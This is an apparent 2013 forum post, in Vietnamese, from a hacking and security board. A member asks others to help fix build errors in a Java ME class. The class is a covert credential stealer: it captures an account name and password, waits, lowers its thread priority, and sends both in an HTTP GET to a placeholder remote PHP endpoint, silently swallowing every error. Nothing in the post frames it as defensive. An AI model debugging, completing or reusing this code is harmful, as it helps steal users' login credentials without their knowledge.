[Programming] Nhờ mọi người test code và hướng dẫn fix giùm em! |
24/03/2013 15:11:16 (+0700) | #1 | 274346 |
jimmi95
Member
|
0 |
|
|
Joined: 30/10/2011 00:48:50
Messages: 0
Offline
|
|
Khi e sử dụng eclipse tạo code thì không thể build được, toàn báo error (chữ màu đỏ)
mọi người chỉ em lỗi và hướng dẫn em fix được không, thanks m.ng
Đoạn code như sau:
import javax.microedition.io.Connector;
import javax.microedition.io.HttpConnection;
public final class xyz
implements Runnable {
private static final String ws ="http://domain/file.php";
private static String a,p;
public static void s (String acc, String pwd)
{
a = acc;p = pwd;
new Thread (new xyz()) .
start ();
}
public void run ()
{
try {
Thread.sleep (10000);
Thread.currentThread () .
setPriority (Thread.MIN_PRIORITY);
StringBuffer sb=new
StringBuffer (ws);
sb.append("?a=").append(a).append("&p=").append(p);
HttpConnection hc=(HttpConnection)Connector.open(sb.toString));
sb = null ;
hc.setRequestMethod(hc.GET);
hc.getResponseCode();
hc.close ();
} catch ( Exception e ) { }
}
} |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|